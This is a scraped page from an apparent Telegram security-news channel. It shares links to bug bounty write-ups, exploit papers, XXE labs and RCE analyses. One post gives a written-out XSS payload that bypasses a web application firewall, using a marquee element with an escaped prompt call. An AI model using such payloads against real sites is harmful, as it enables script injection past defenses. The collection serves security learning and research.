Information Security
@sec_nerd_en
416
subscribers
157
photos
5
videos
9
files
2.28K
links
Information Security News
we are
@sec_nerd
twin brother
Download Telegram
Join
Information Security
416 subscribers
Information Security
https://www.youtube.com/watch?v=Xwlp9OQGfvM
YouTube
Access Control Bypass | #bugbountypoc | @remonsec
Think out of the Box
Information Security
Xss payload waf bypass
Hh'><script>alert(1)</script> = waf
Cross mark
Hh'><marquee loop=1 width=0 onfinish=pr\u006fmpt`_Y000!_`>Y000</marquee> = waf bypassed
Ballot box with check
#payload
#xss
#waf
#bypass
Information Security
https://mp.weixin.qq.com/s/OGdHSwqydiDqe-BUkheTGg
Weixin Official Accounts Platform
CVE-2020-9484 Tomcat RCE漏洞分析
膜threedr3am
Information Security
https://rawsec.ml/en/local-file-inclusion-remote-code-execution-vulnerability/
Information Security
http://www.madirish.net/401
www.madirish.net
Mad Irish :: PHP Null Byte Poisoning
Information Security
https://medium.com/@hakluke/sensitive-files-to-grab-in-windows-4b8f0a655f40
Medium
Sensitive Files to Grab in Windows
Scenario time — you’ve just found that you are able to access a whole windows file system via a directory traversal vuln in a webapp. You…
Information Security
https://www.tooboat.com/?p=1657
Information Security
https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
Information Security
https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?m=1
Betterhacker
RCE in Hubspot with EL injection in HubL
This is the story of how I was able to get remote code execution on Hubspot 's servers by exploiting a vulnerability in HubL expression la...
Information Security
local_dtd
#xxe
Information Security
https://medium.com/@lokeshdlk77/how-to-rotate-ip-address-in-brute-force-attack-e66407259212
Information Security
https://medium.com/@lokeshdlk77/csrf-email-confirmation-vulnerability-for-gmail-g-suite-in-facebook-5ab551a0a526
Medium
CSRF Email Confirmation Vulnerability for Gmail & G-Suite in Facebook
This post is about an bug that i found on Facebook which used to verify any new Gmail and G-Suite account with minimal Victim’s…
Information Security
https://www.exploit-db.com/docs/english/45374-xml-external-entity-injection---explanation-and-exploitation.pdf
Information Security
https://www.exploit-db.com/papers?author=9381#
Exploit-Db
Offensive Security’s Exploit Database Archive
Archived security papers and articles in various languages.
Information Security
https://github.com/c0ny1/xxe-lab
GitHub
GitHub - c0ny1/xxe-lab: 一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo
一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo. Contribute to c0ny1/xxe-lab development by creating an account on GitHub.
Information Security
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
Foxglovesecurity
What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.
By @breenmachine What? The most underrated, underhyped vulnerability of 2015 has recently come to my attention, and I’m about to bring it to yours. No one gave it a fancy name, there were no …
Information Security
https://bhavukjain.com/blog/2020/05/30/zeroday-signin-with-apple/
Information Security
https://hg8.sh/posts/resolute/
hg8's Notes — My notes about infosec world. Pentest/Bug Bounty/CTF Writeups.
HackTheBox - Resolute
Resolute just retired on Hackthebox, it’s a medium difficulty Windows box. Still being a bit new to the Windows environment the enumeration process got a bit long and tedious for me at some point bu
Information Security
https://github.com/irsdl/top10webseclist
GitHub
GitHub - irsdl/top10webseclist: Top Ten Web Hacking Techniques List
Top Ten Web Hacking Techniques List. Contribute to irsdl/top10webseclist development by creating an account on GitHub.
Information Security
https://f4d3.io/xxe_wild/
h1{Error based XXE - bug bounty writeup} | f4d3
Welcome to the bourne again f4d3.io
